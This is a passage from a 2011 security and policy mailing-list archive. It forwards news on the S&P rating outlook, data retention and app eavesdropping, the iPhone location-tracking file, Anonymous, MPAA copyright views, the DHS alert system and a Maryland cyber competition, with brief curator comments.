?The final solution to problems of [cyberdefense and the] formation of Jihad, is to achieve economic self-sufficiency in the production of basic software such as operating systems and software,? he said. From rforno at infowarrior.org Mon Apr 18 08:24:55 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 18 Apr 2011 09:24:55 -0400 Subject: [Infowarrior] - S&P Cuts U.S. Ratings Outlook to Negative Message-ID: (Anyone not knowing this was coming? --- rick) April 18, 2011, 9:19 a.m. EDT S&P Cuts U.S. Ratings Outlook to Negative http://www.marketwatch.com/story/sp-cuts-us-ratings-outlook-to-negative-2011-04-18-91500 WASHINGTON?Standard & Poor's cut its ratings outlook on the U.S. to negative from stable while keeping its Triple-A rating on the world's largest economy. "More than two years after the beginning of the recent crisis, U.S. policymakers have still not agreed on how to reverse recent fiscal deterioration or address longer-term fiscal pressures," said Standard & Poor's credit analyst Nikola G. Swann . U.S. stock futures plunged on the news, with Dow industrial futures falling 167 points. Bond yields rose. Write to Steve Goldstein at steven.goldstein at dowjones.com From rforno at infowarrior.org Mon Apr 18 12:55:00 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 18 Apr 2011 13:55:00 -0400 Subject: [Infowarrior] - Why Listen to S&P on US Debt? Message-ID: <36CA4842-C50F-4A5B-9C35-8584191F2747@infowarrior.org> (Amen, Barry! --- rick) Why Listen to S&P on US Debt? By Barry Ritholtz - April 18th, 2011, 11:10AM http://www.ritholtz.com/blog/2011/04/why-listen-to-sp-on-us-debt/ There is an old Wall Street joke about analysts: ?You don?t need them in a Bull Market, and you don?t want them in a Bear Market.? Which brings me to Standard & Poor?s. They put a ?negative? outlook on the U.S. AAA credit rating, citing rising budget deficits and debt. To which I say ?Who Cares?? Its not that I disagree with their assessment ? I do not ? 
but I pay it little heed. It was much more important to me as an investor that PIMCO's Bill Gross was out of Treasuries a month ago (and indeed, is short) than what S&P says. That was all any bond investor needed to know; no ratings agency necessary.

If ever there was an organization more corrupt, incompetent, and less capable of issuing an intelligent analysis on debt than S&P, I am unaware of them.

Why do I write this? A huge part of the reason the US is in its awful financial position is due to the fine work of S&P. Consider what Nobel Laureate Joseph Stiglitz, economics professor at Columbia University in New York, observed:

"I view the ratings agencies as one of the key culprits. They were the party that performed that alchemy that converted the securities from F-rated to A-rated. The banks could not have done what they did without the complicity of the ratings agencies."

Hence, the "negative outlook" of US debt has come about because of the inability of Standard & Poor's to have performed their jobs rating mortgage backed securities. Ultimately, this enabled the entire crisis, financial collapse, enormous budget deficit and now political over the debt ceiling.

Of course there is a negative future outlook. It's in large part the work product of S&P and Moody's. Why we even have Nationally Recognized Statistical Rating Organizations (NRSRO) any longer following their payola-driven corruption, their gross incompetency and their inability to discharge their basic duties is beyond my understanding.

From rforno at infowarrior.org Mon Apr 18 13:11:02 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Mon, 18 Apr 2011 14:11:02 -0400
Subject: [Infowarrior] - Yahoo plans to keep search records for 18 months
Message-ID: <23E4D034-C641-43E0-B2FA-E419DB6139A1@infowarrior.org>

(Funny, I didn't know anyone used Yahoo for search. --- rick)

Yahoo plans to keep search records for 18 months
By JOELLE TESSLER, AP Technology Writer -
1 hr 2 mins ago
http://news.yahoo.com/s/ap/20110418/ap_on_hi_te/us_tec_yahoo_data_retention

WASHINGTON - Yahoo plans to extend the amount of time it retains user search records to 18 months from 90 days. The company says it will consider keeping other types of information about its users for longer durations, too.

The new data retention policy marks an about-face for Yahoo. In late 2008, the company became the first big Internet search engine to commit to "anonymizing" a wide range of user data after 90 days in most cases. Such data, including records of Web searches, page views and ad clicks, are used to personalize Web content and target online advertising. Yahoo anonymizes the data by stripping out portions of users' numeric Internet addresses, altering small tracking files known as "cookies" and deleting other potential personally identifiable information.

From rforno at infowarrior.org Mon Apr 18 13:41:03 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Mon, 18 Apr 2011 14:41:03 -0400
Subject: [Infowarrior] - Snooping: It's not a crime, it's a feature
Message-ID: <81020BB1-F3F0-4B97-A39D-29524F037BA9@infowarrior.org>

Snooping: It's not a crime, it's a feature
New apps hijack the microphone in your cell phone to listen in on your life
Mike Elgan
April 16, 2011 (Computerworld)
http://www.computerworld.com/s/article/print/9215853/Snooping_It_s_not_a_crime_it_s_a_feature

Cellphone users say they want more privacy, and app makers are listening. No, they're not listening to user requests. They're literally listening to the sounds in your office, kitchen, living room and bedroom.

A new class of smartphone app has emerged that uses the microphone built into your phone as a covert listening device -- a "bug," in common parlance. But according to app makers, it's not a bug. It's a feature! The apps use ambient sounds to figure out what you're paying attention to. It's the next best thing to reading your mind.
Your phone is listening

The issue was brought to the world's attention recently on a podcast called This Week in Tech. Host Leo Laporte and his panel shocked listeners by unmasking three popular apps that activate your phone's microphone to collect sound patterns from inside your home, meeting, office or wherever you are.

The apps are Color, Shopkick and IntoNow, all of which activate the microphones in users' iPhone or Android devices in order to gather contextual information that provides some benefit to the user.

Color uses your iPhone's or Android phone's microphone to detect when people are in the same room. The data on ambient noise is combined with color and lighting information from the camera to figure out who's inside, who's outside, who's in one room, and who's in another, so the app can auto-generate spontaneous temporary social networks of people who are sharing the same experience.

Shopkick works on both iPhone and Android devices. One feature of the app is to reward users for simply walking into participating stores, which include Target, Best Buy, Macy's, American Eagle Outfitters, Sports Authority, Crate & Barrel and many others. Users don't have to press any button. Shopkick listens through your cellphone for inaudible sounds generated in the stores by a special device.

IntoNow is an iOS app that allows social networking during TV shows. The app listens with your iPhone or iPad to identify what you're watching. The company claims 2.6 million "broadcast airings" (TV shows or segments) in its database.

A similar app created for fans of the TV show Grey's Anatomy uses your iPad's microphone to identify exactly where you are in the show, so it can display content relevant to specific scenes. While IntoNow is based on the company's own SoundPrint technology, the Grey's Anatomy app is built on Nielsen's Media-Sync platform.

Obviously, the idea that app companies are eavesdropping on private moments creeps everybody out.
But all these apps try to get around user revulsion by recording not actual sounds, but sound patterns, which are then uploaded to a server as data and compared with the patterns of other sounds. Color compares sounds between users to figure out which users are listening to the same thing. Shopkick compares sounds to its database of unique inaudible patterns that identify each store. The SoundPrint- and Media-Sync-based apps compare sound patterns to their database of patterns mapped from all known TV shows.

Who else is listening?

Apps that listen have been around for years. One type of app uses your phone's microphone to identify music. Apps like Shazam and SoundHound can "name that tune" in a few seconds by simply "listening" to whatever song is playing in the room.

A class of alarm clock apps uses your phone's microphone to listen to you sleep. One example is the HappyWakeUp app. If you're sleeping like a log, the app avoids waking you. When HappyWakeUp hears you tossing and turning near the scheduled time, it wakes you up with an alarm.

Of course, the use of your microphone with these apps is well understood by users, because that's the main purpose of the app. The new apps are often sneakier about it. The vast majority of people who use the Color app, for example, have no idea that their microphones are being activated to gather sounds. Welcome to the future.

Coming soon: A lot more apps that listen

What you need to know about marketing and advertising is that data is king. Marketers can never get enough, because the more they know about you and your lifestyle, the more effective their marketing and the more valuable and expensive their advertising. That's why marketers love cellphones, which are viewed as universal sensors for conducting highly granular, real-time market research.

Of course, lots of apps transmit all kinds of private data back to the app maker.
Some send back each phone's Unique Device Identification (UDI), the number assigned to each mobile phone, which can be used to positively identify it. Other apps tell the servers the phone's location. Many apps actually snoop around on your phone, gathering up personal information, such as gender, age and ZIP code, and zapping it back to the company over your phone's data connection.

Most app makers disclose much of what they gather, including audio data, but they often do so either on their websites or buried somewhere in the legal mumbo jumbo.

It turns out that, thanks to sophisticated pattern-recognition software, harvested sounds from your home, office or environment can be transformed into marketing demographic gold. You should know that any data that can be gathered, will be gathered. Since the new microphone-hijacking apps are still around, we now know that listening in on users is OK.

So, what's possible with current technology? By listening in on your phone, capturing "patterns," then sending that data back to servers, marketers can determine the following:

- Your gender, and the gender of people you talk to.
- Your approximate age, and the ages of the people you talk to.
- What time you go to bed, and what time you wake up.
- What you watch on TV and listen to on the radio.
- How much of your time you spend alone, and how much with others.
- Whether you live in a big city or a small town.
- What form of transportation you use to get to work.

All this data and more, plus the UDI on your phone, could enable advertising companies to send you very narrowly targeted advertising for products and services that you're likely to want.

The future of marketing is contextual. And listening in on your life will enable marketers to deeply understand not only who and where you are, but also what you're paying attention to.

How do you feel about cellphone apps listening in on your life? If you'd like to tell me, I'm listening, too.
Mike Elgan writes about technology and tech culture. Contact and learn more about Mike at Elgan.com, or subscribe to his free e-mail newsletter, Mike's List.

From rforno at infowarrior.org Mon Apr 18 14:24:07 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Mon, 18 Apr 2011 15:24:07 -0400
Subject: [Infowarrior] - Secrecy of Cyber Threats Said to Cause Complacency
Message-ID:

Secrecy of Cyber Threats Said to Cause Complacency
April 18th, 2011 by Steven Aftergood
http://www.fas.org/blog/secrecy/2011/04/cyber_secrecy.html

The American public does not have an accurate sense of the threat posed by attacks in cyberspace because most of the relevant threat information is classified, according to Sen. Sheldon Whitehouse (D-RI), who introduced legislation last week to raise public awareness of cyber security hazards.

"The damage caused by malicious activity in cyberspace is enormous and unrelenting," Sen. Whitehouse said on April 14. "Every year, cyber attacks inflict vast damage on our Nation's consumers, businesses, and government agencies. This constant cyber assault has resulted in the theft of millions of Americans' identities; exfiltration of billions of dollars of intellectual property; loss of countless American jobs; vulnerability of critical infrastructure to sabotage; and intrusions into sensitive government networks."

"These massive attacks have not received the attention they deserve. Instead, we as a nation remain woefully unaware of the risks that cyber attacks pose to our economy, our national security, and our privacy," he said. "This problem is caused in large part by the fact that cyber threat information ordinarily is classified when it is gathered by the government or held as proprietary when collected by a company that has been attacked.
As a result, Americans do not have an appropriate sense of the threats that they face as individual Internet users, the damage inflicted on our businesses and the jobs they create, or the scale of the attacks undertaken by foreign agents against American interests."

With Sen. Jon Kyl (R-AZ), Sen. Whitehouse introduced the "Cyber Security Public Awareness Act" to require government agencies to provide increased public reporting of cyber threat information.

"As of 2011, the level of public awareness of cyber security threats is unacceptably low. Only a tiny portion of relevant cyber security information is released to the public. Information about attacks on Federal Government systems is usually classified. Information about attacks on private systems is ordinarily kept confidential. Sufficient mechanisms do not exist to provide meaningful threat reports to the public in unclassified and anonymized form," the bill stated.

Last year, Sen. Whitehouse chaired a bipartisan Senate Intelligence Committee task force on cyber security. "The government keeps the damage we are sustaining from cyber attacks secret because it is classified," he said last November. "The private sector keeps the damage they are sustaining from cyber attacks secret so as not to look bad to customers, to regulators, and to investors. The net result of that is that the American public gets left in the dark."

From rforno at infowarrior.org Mon Apr 18 15:22:35 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Mon, 18 Apr 2011 16:22:35 -0400
Subject: [Infowarrior] - Judge in Righthaven case has some fun ....
Message-ID: <52672F92-8D50-4CFE-ABD3-2F22DC23D9DF@infowarrior.org>

Rule #1 in court cases: Don't get the judge angry and CERTAINLY don't suggest that s/he's wrong.
Righthaven Tells Judge Handling All Its Colorado Cases That He's Wrong
http://www.techdirt.com/articles/20110416/01323713925/righthaven-tells-judge-handling-all-its-colorado-cases-that-hes-wrong.shtml

Judge Slams Righthaven's Legal Tactics, Unseals Document That May Undermine All Righthaven Cases
http://www.techdirt.com/articles/20110416/00461913923/judge-slams-righthavens-legal-tactics-unseals-document-that-may-undermine-all-righthaven-cases.shtml

Unsealed Document Reveals 'Sham' Copyright Assignments To Righthaven
http://www.techdirt.com/articles/20110416/01084413924/unsealed-document-reveals-sham-copyright-assignments-to-righthaven.shtml

From rforno at infowarrior.org Tue Apr 19 07:28:11 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 19 Apr 2011 08:28:11 -0400
Subject: [Infowarrior] - Anonymous Silenced By YouTube
Message-ID:

(won't make a huge difference, imho. --- rick)

Anonymous Silenced By YouTube
http://torrentfreak.com/anonymous-silenced-by-youtube-110419/
enigmax | 19/04/2011

Trying to keep up with the latest developments from Anonymous is proving a little tricky this month. Since the beginning of the year the group has been releasing videos to spread news and details of forthcoming operations. Many, if not all, Anonymous videos have been uploaded to YouTube but since the start of April the Google-owned site has been censoring them.

The last three (Operation Sony, April 4, 2011; Operation Sony Update, April 12, 2011; and Operation Black Out, April 18, 2011) have all been removed on Terms of Service violations. The one we were most interested in was the latter, which contained information on a planned protest against the New Zealand government. They passed a 3 strikes-style law to deal with online file-sharing last week which hasn't impressed Anonymous.

According to information received by TorrentFreak, Anonymous still have some heavy punishment for Sony up their collective sleeves. The anonymous (that's a small "a")
tip suggests that a DDoS is coming, but one with a new technical twist, not previously utilized by the group.

http://torrentfreak.com/anonymous-silenced-by-youtube-110419/

From rforno at infowarrior.org Tue Apr 19 11:27:53 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 19 Apr 2011 12:27:53 -0400
Subject: [Infowarrior] - Software on the Witness Stand: What Should It Take for Us to Trust It?
Message-ID: <32E40C2C-9D50-459F-9CE7-EA198BB52FDC@infowarrior.org>

http://www.cs.dartmouth.edu/~sergey/trusting-e-evidence.pdf

Software on the Witness Stand: What Should It Take for Us to Trust It?
Sergey Bratus (1), Ashlyn Lembree (2), Anna Shubina (1)
(1) Institute for Security, Technology, and Society, Dartmouth College, Hanover, NH
(2) Franklin Pierce Law Center, Concord, NH

1 Motivation

We discuss the growing trend of electronic evidence, created automatically by autonomously running software, being used in both civil and criminal court cases. We discuss trustworthiness requirements that we believe should be applied to such software and platforms it runs on. We show that courts tend to regard computer-generated materials as inherently trustworthy evidence, ignoring many software and platform trustworthiness problems well known to computer security researchers. We outline the technical challenges in making evidence-generating software trustworthy and the role Trusted Computing can play in addressing them.

This paper is structured as follows: Part I is a case study of electronic evidence in a "file sharing" copyright infringement case, potential trustworthiness issues involved, and ways we believe they should be addressed with state-of-the-art computing practices. Part II is a legal analysis of issues and practices surrounding the use of software-generated evidence by courts.
http://www.cs.dartmouth.edu/~sergey/trusting-e-evidence.pdf

From rforno at infowarrior.org Tue Apr 19 13:35:38 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 19 Apr 2011 14:35:38 -0400
Subject: [Infowarrior] - Silly Giant Boarding Pass
Message-ID: <6F0EF752-3512-41E9-BAF1-DDF6FD672109@infowarrior.org>

(c/o DS)

http://bbryson.com/bill/2007/10/12/have-you-ever-printed-a-boarding-pass/

Well this little feat has been a long time coming. For those of you who have worked with me in Unalakleet you probably have heard about my aspiration of using the poster printer to print my boarding pass. Well two days ago my dream became a reality. I logged onto nwa.com and checked in for my flight. Selected my seats and chose the option to print my boarding pass... I was on two different flights and both boarding pass tickets were on the same page stacked on top of each other. This wouldn't do; I need each boarding pass to be on a different print out to really dramatize the "Big Boarding Pass". So I took a screen shot of each individual one and then took them over to the poster printer. Each one printed out to be about three feet wide and about 1.5 feet tall....

From rforno at infowarrior.org Tue Apr 19 20:45:43 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 19 Apr 2011 21:45:43 -0400
Subject: [Infowarrior] - New Alzheimer's Guidelines: Will They Help Doctors Spot the Disease Earlier?
Message-ID: <4C274840-0BC0-4D0B-81FB-37D1B7CCB279@infowarrior.org>

New Alzheimer's Guidelines: Will They Help Doctors Spot the Disease Earlier?
By Alice Park
Tuesday, April 19, 2011
http://healthland.time.com/2011/04/19/new-alzheimers-guidelines-will-they-help-doctors-spot-the-disease-earlier/print/

For the first time in nearly three decades, experts have created a set of guidelines to better diagnose Alzheimer's disease in the clinic. The advice also helps doctors identify the earliest signs of the degenerative condition, even before symptoms of memory loss begin.
The hope is that they can help patients prepare early, and eventually treat, the disease.

I first wrote about these guidelines when the Alzheimer's Association and the National Institute on Aging released a draft version in June 2010, so that researchers could review and comment on them. Not much has changed in the final version, but here's a breakdown of how they will be applied.

Currently, Alzheimer's disease can be definitively diagnosed only at autopsy, when pathologists can confirm the presence of protein plaques and tangles in the brain of a patient who had shown signs of memory loss and cognitive deficits. The new guidelines tease apart three different stages of the disease that are meant to help doctors better identify affected patients while they are alive. The phases also reflect the latest research, which suggests that Alzheimer's develops in the brain over a long period of time, perhaps years or even decades before the first cognitive deficits are noticeable.

The first stage, known as preclinical Alzheimer's disease, includes those who are on the road to the neurodegenerative decline typical of the condition. These patients have no signs of any problems yet (they have no difficulty with memory or recall, and remain mentally intact) but in their brains, the protein amyloid is starting to build up. Scientists are developing ways to detect this subtle accumulation, just as blood tests pick up rising cholesterol levels that can contribute to heart disease, and imaging screens identify the smallest lesions that will become cancerous tumors. The guidelines suggest ways that blood tests sensitive enough to pick up abnormal levels of amyloid, as well as tests of spinal fluid for the protein, might be used at this stage to identify those who might be at greater risk of developing Alzheimer's. The experts creating these guidelines stress that the tests should be used only in research studies at this point, since they have yet to be validated.
But doctors need to start studying them, they said, and should learn to familiarize themselves with how they might work.

The next phase is called pre-dementia, and encompasses patients who might be showing the first signs of memory lapses, changes in learning or attention, and other deficits in thinking. Otherwise known as mild cognitive impairment (MCI), these symptoms may be noticeable to both the patient and her family and friends, and while obvious, they may not be severe enough yet to cause any problems with daily activities. A subset of those with MCI go on to develop Alzheimer's, and the guidelines specify four levels of the condition that can help doctors distinguish which cases are more likely to progress to Alzheimer's and which are not. Also at this stage, newer techniques such as brain imaging studies are hinting that it may be possible to separate Alzheimer's MCI from other types of dementia, but these are also still in the research stages and not ready for use in diagnosing patients in the clinic.

Finally, the guidelines specify the criteria for the third stage, which includes patients with dementia due to Alzheimer's disease; these patients have cognitive deficits that impair a person's ability to function in his daily life. In addition, this stage would include people with genetic mutations linked to the disease, which are responsible for both the early onset condition that runs in families as well as the more common dementia that progresses later in life. Even for patients with dementia, the guidelines suggest the potential use of blood or imaging tests that could further distinguish abnormal deficits associated with Alzheimer's from the more normal mental decline typical of aging.

The idea behind the guidelines is to make it easier for non-specialists (physicians without access to sophisticated brain imaging instruments or the latest assays for blood or spinal fluid tests)
to distinguish the Alzheimer's patient from others suffering from dementia. That way, say experts, these patients could become part of research studies in which newer methods for diagnosing the disease can be tested and validated. Such participants would also be eligible for testing new treatments that might stop or reverse the neurodegenerative disease, and if those prove successful, would help turn the tide on the flood of cases that are expected in the coming years as the baby boom population ages.

The guidelines may not make a significant difference in the everyday care of patients today, but they could lay the foundation for a fundamental shift in understanding and treating the disease tomorrow.

Find this article at: http://healthland.time.com/2011/04/19/new-alzheimers-guidelines-will-they-help-doctors-spot-the-disease-earlier/

From rforno at infowarrior.org Wed Apr 20 13:43:34 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 20 Apr 2011 14:43:34 -0400
Subject: [Infowarrior] - iPhone keeps record of everywhere you go
Message-ID:

iPhone keeps record of everywhere you go
Privacy fears raised as researchers reveal file on iPhone that stores location coordinates and timestamps of owner's movements
Charles Arthur, guardian.co.uk, Wednesday 20 April 2011 14.06 BST
http://www.guardian.co.uk/technology/2011/apr/20/iphone-tracking-prompts-privacy-fears

Security researchers have discovered that Apple's iPhone keeps track of where you go, and saves every detail of it to a secret file on the device which is then copied to the owner's computer when the two are synchronised.

The file contains the latitude and longitude of the phone's recorded coordinates along with a timestamp, meaning that anyone who stole the phone or the computer could discover details about the owner's movements using a simple program.
For some phones, there could be almost a year's worth of data stored, as the recording of data seems to have started with Apple's iOS 4 update to the phone's operating system, released in June 2010.

"Apple has made it possible for almost anybody - a jealous spouse, a private detective - with access to your phone or computer to get detailed information about where you've been," said Pete Warden, one of the researchers.

Only the iPhone records the user's location in this way, say Warden and Alasdair Allan, the data scientists who discovered the file and are presenting their findings at the Where 2.0 conference in San Francisco on Wednesday. "Alasdair has looked for similar tracking code in [Google's] Android phones and couldn't find any," said Warden. "We haven't come across any instances of other phone manufacturers doing this."

Simon Davies, director of the pressure group Privacy International, said: "This is a worrying discovery. Location is one of the most sensitive elements in anyone's life; just think where people go in the evening. The existence of that data creates a real threat to privacy. The absence of notice to users or any control option can only stem from an ignorance about privacy at the design stage."

Warden and Allan point out that the file is moved onto new devices when an old one is replaced: "Apple might have new features in mind that require a history of your location, but that's our speculation. The fact that [the file] is transferred across [to a new iPhone or iPad] when you migrate is evidence that the data-gathering isn't accidental." But they said it does not seem to be transmitted to Apple itself.

Map shows location data collected from an iPhone that had been used in the southwest of England

Although mobile networks already record phones' locations, it is only available to the police and other recognised organisations following a court order under the Regulation of Investigatory Power Act. Standard phones do not record location data.
MPs in 2009 criticised the search engine giant Google for its "Latitude" system, which allowed people to enable their mobile to give out details of their location to trusted contacts. At the time MPs said that Latitude "could substantially endanger user privacy", but Google pointed out that users had to specifically choose to make their data available. The iPhone system, by contrast, appears to record the data whether or not the user agrees.

Apple declined to comment on why the file is created or whether it can be disabled.

Warden and Allan have set up a web page which answers questions about the file, and created a simple downloadable application to let Apple users check for themselves what location data the phone is retaining. The Guardian has confirmed that 3G-enabled devices including the iPad also retain the data and copy it to the owner's computer.

If someone were to steal an iPhone and "jailbreak" it, giving them direct access to the files it contains, they could extract the location database directly. Alternatively, anyone with direct access to a user's computer could run the application and see a visualisation of their movements. Encrypting data on the computer is one way to protect against it, though that still leaves the file on the phone.

Graham Cluley, senior technology consultant at the security company Sophos, said: "If the data isn't required for anything, then it shouldn't store the location. And it doesn't need to keep an archive on your machine of where you've been." He suggested that Apple might be hoping that it would yield data for future mobile advertising targeted by location, although he added: "I tend to subscribe to cockup rather than conspiracy on things like this. I don't think Apple is really trying to monitor where users are."

The data inside the file containing the location and time information. This is used to plot the map above

The location file came to light when Warden and Allan were looking for a source of mobile data.
"We'd been discussing doing a visualisation of mobile data, and while Alasdair was researching into what was available, he discovered this file. At first we weren't sure how much data was there, but after we dug further and visualised the extracted data, it became clear that there was a scary amount of detail on our movements," Warden said.

They have blogged about their discovery at O'Reilly's Radar site, noting that "why this data is stored and how Apple intends to use it - or not - are important questions that need to be explored."

The pair of data scientists have collaborated on a number of data visualisations, including a map of radiation levels in Japan for The Guardian. They are developing a Data Science Toolkit for dealing with location data.

Davies said that the discovery of the file indicated that Apple had failed to take users' privacy seriously.

Apple can legitimately claim that it has permission to collect the data: near the end of the 15,200-word terms and conditions for its iTunes program, used to synchronise with iPhones, iPods and iPads, is an 86-word paragraph about "location-based services". It says that "Apple and our partners and licensees may collect, use, and share precise location data, including the real-time geographic location of your Apple computer or device. This location data is collected anonymously in a form that does not personally identify you and is used by Apple and our partners and licensees to provide and improve location-based products and services. For example, we may share geographic location with application providers when you opt in to their location services."
From rforno at infowarrior.org Wed Apr 20 18:56:08 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 20 Apr 2011 19:56:08 -0400
Subject: [Infowarrior] - MPAA: "Democratizing Culture Is Not In Our Interest"
Message-ID: <9FA51AB2-771C-451C-9153-21E50C610285@infowarrior.org>

MPAA: "Democratizing Culture Is Not In Our Interest"
Ernesto | 20/04/2011
http://torrentfreak.com/mpaa-democratizing-culture-is-not-in-our-interest-110420/

MPAA Vice President Greg Frazier has made some interesting comments on copyright and widespread Internet piracy during a lobbying visit to Brazil. Among other things, Frazier told a local newspaper that democratizing culture is not in the interests of the MPAA. As it turns out, the MPAA's definition of creativity and culture is a rather narrow one that is quite different from that of the general public.

The MPAA sent its Vice President Greg Frazier to Brazil this week to carry out some damage control. Last year the former president of Brazil posed with Pirate Bay founder Peter Sunde and vowed not to cave in to the interests of the copyright lobby. But with the change of leadership the MPAA sees new chances, and so Frazier went to Brazil to convince local politicians that tougher anti-piracy laws are needed.

In common with most Latin American countries, piracy is widespread in Brazil. According to a recent study more than half of all people living in urban areas regularly pirate movies, something the MPAA believes has to be stopped.

In an interview with local newspaper Folha, Frazier commented on the threat piracy poses to the major studios, responding with the classic textbook answers we've heard hundreds of times before.

"If you do not believe in the value of creativity, the importance of protecting it and the need to reward those who produce, then maybe you can justify piracy. But in that case you'll be doing great harm to culture," Frazier said. Please note the words "creativity"
and "culture" in his answer, as we'll come back to that later.

The reporter then went on to ask how important copyright really is when 44% of households in Brazil are not connected to the sewer system. Not really a fair question, but Frazier made it very clear that even when people are starving it would be immoral to "steal" entertainment from U.S. corporations.

"Obviously, governments and societies have to work to make sure that the population has access to the basics in order to survive, but that does not mean you should ignore other things. Companies must live together because they respect each other and respect that people do not steal from one another. Even if you battle to put food on your plate, it is immoral to steal," he said.

Things got more interesting when Frazier responded in a surprisingly open manner when asked about Creative Commons licenses, which allow for a more flexible approach to copyright. Creative Commons licenses are very popular in Brazil and the reporter wanted to know what the MPAA's view on this approach is.

"They [Creative Commons supporters] don't always agree with what we advocate," Frazier responded. "And you are talking about democratizing culture, this is not in our interests. It really isn't my interest."

Although this answer may not really come as a surprise, combined with his previous answers it shows how subjective the MPAA's view on creativity and culture is. According to the MPAA piracy is ruining culture, but at the same time they are not allowing others to use even tiny snippets of their works. The MPAA is apparently only interested in creativity and culture when it applies to the works their studios produce.

Needless to say, this isn't necessarily what's most beneficial to society. The MPAA is merely protecting their corporate interests. For the general public, culture and creativity are probably better off with less restrictive copyright laws.
This doesn't mean that it should be okay to pirate every Hollywood blockbuster, but the laws that are put in place to please the movie studios are the same ones that cripple the creativity of tens of thousands of other artists and the public at large.

To the MPAA and many others in the entertainment industry, copyright has little to do with the word right, nor with creativity and culture. Instead, it's a restrictive tool that allows works to be traded, leased and licensed in return for money. Indeed, democratizing culture is not in the MPAA's interest, but maximizing profits and control is.

From rforno at infowarrior.org Wed Apr 20 20:33:02 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 20 Apr 2011 21:33:02 -0400
Subject: [Infowarrior] - DHS announces new terror alert system
Message-ID:

DHS announces new terror alert system
By Keith Laing - 04/20/11 09:35 AM ET
http://thehill.com/blogs/transportation-report/aviation/156967-napolitano-announces-new-terror-alert-system

Homeland Security Secretary Janet Napolitano announced the end of the color-coded terror alert system that has marked U.S. airports since 9/11, replacing it with what she calls a more specific system that will address targeted threats.

Under the new system, there will only be two categories when alerts are necessary: "elevated threat" and "imminent threat." Alerts will be issued for specific areas of concern, not nationwide. They will also be delivered via traditional and social media.

Napolitano said the terror threat has changed since 9/11, so it was time for the alert system to change, too.

"The terrorist threat facing our country has evolved significantly over the past 10 years, and in today's environment - more than ever - we know that the best security strategy is one that counts on the American public as a key partner in securing our country," she said in a statement announcing the decision.
"The National Terrorism Advisory System, which was developed in close collaboration with our federal, state, local, tribal and private sector partners, will provide the American public with information about credible threats so that they can better protect themselves, their families, and their communities," Napolitano said.

Napolitano did a round of television interviews Wednesday morning to talk up the new system. On NBC's "Today Show," she said the old color system was no longer effective because it confused passengers.

"We've been orange since 2006," she said. "What we are changing is to a system that actually gives people specificity, tells them what to do, what to prepare, what to look for and how to get more information."

"It would sunset in two weeks, so we get out of this business of cascading alerts," Napolitano added.

Napolitano said the new alert system will take effect April 26.

The homeland security secretary made the announcement a day after reports surfaced that an error by an air traffic controller forced a plane carrying first lady Michelle Obama and Vice President Joe Biden's wife Jill to abort its landing because a military plane had not cleared the runway yet.

Napolitano said the incident involving the first and second ladies did not show that the national aviation system was vulnerable to another terrorist attack.

"Not in that sense from a terrorism exploitation thing," she said. "I think it's more of a concern about day-to-day aviation safety. Air traffic controllers are key to the safety of the aviation system overall."

She also praised the administration's response to that incident and to the rash of reports of air traffic controllers sleeping on the job.

"I think (Transportation) Secretary LaHood and the FAA are really looking internally about what they need to do, change process, procedures, training, staffing, all the things that go into making sure the air traffic control system remains safe," Napolitano said.
From rforno at infowarrior.org Thu Apr 21 07:45:14 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 21 Apr 2011 08:45:14 -0400
Subject: [Infowarrior] - more on ... iPhone tracking
References: <201104211240.p3LCeMVe010258@synergy.ecn.purdue.edu>
Message-ID: <0D22C928-48B4-4069-BE54-57E32B825A44@infowarrior.org>

Begin forwarded message:

> From: Joe C
>
> Hi Richard,
>
> Don't know if you have seen this one.
>
> Here's a video of Warden/Allan explaining it all. Looks like it's also
> tracking wireless APs and magnetic field strengths.
>
> http://ibnlive.in.com/news/your-iphone-is-secretly-tracking-you/149784-11.html?from=hp
>

From rforno at infowarrior.org Thu Apr 21 07:54:46 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 21 Apr 2011 08:54:46 -0400
Subject: [Infowarrior] - Inaugural Maryland Cyber Challenge & Conference (MDC3) Now Enrolling Teams
Message-ID: <0A7830CB-0DDC-4F1C-8C4E-7834C69BC145@infowarrior.org>

(Disclosure: I am co-chair of the Steering Committee. --- rick)

Inaugural Maryland Cyber Challenge & Conference (MDC3) Now Enrolling Teams
Posted April 20, 2011
http://www.umbc.edu/blogs/umbcnews/2011/04/inaugural_maryland_cyber_chall_1.html

Baltimore -- Organizers of the Maryland Cyber Challenge & Conference (MDC3) announced today that registration is now open for high school students, college students and cybersecurity professionals who wish to compete for scholarships and prizes in this inaugural event to be held October 21-22 at the Baltimore Convention Center.

The competition is seeking teams of up to six players who will compete in three divisions of competition: high school, college or university, and professional. The competition is open to any student enrolled in a Maryland high school, college or university, or any professional employed by a company or government agency with an office in Maryland.
(http://www.mdc3.org/)

Potential competitors only need a basic knowledge of Windows and UNIX to participate, and will have the opportunity to learn how the challenge games will be played during an orientation session. The first of three orientation sessions for competitors will be held May 2 at UMBC in the main seminar room of the Incubator and Accelerator building, bwtech at UMBC South (1450 South Rolling Road, Baltimore, MD 21227). Orientation for professionals will be held from 4:30 p.m. - 5:30 p.m., and for high school and college students from 6 p.m. - 7 p.m. Anyone interested in registering a team for the competition should attend an orientation session; those who cannot attend in person will be able to access the session online. Additional orientation sessions will be held May 18 and June 21.

Once teams register, they will be able to participate in practice competitions throughout the summer to prepare for the MDC3 qualifying rounds to be held in September. Full competition details and registration information are available on both the MDC3 website (www.MDC3.org) and Facebook page (search "Maryland Cyber Challenge").

By participating in MDC3, competitors will have the opportunity to learn and develop skills and techniques needed to protect vital information systems while participating in a fun, competitive, team-based activity. Throughout the challenge, high school teams will practice basic cyber defense techniques, while university and professional teams will use more advanced forensic techniques and employ both offensive and defensive strategies in a head-to-head "capture the flag" challenge.

Beginning in September, two qualifying rounds will be held online using SAIC's Cyber Network Exercise System (CyberNEXS), a scalable training, exercise and certification system.
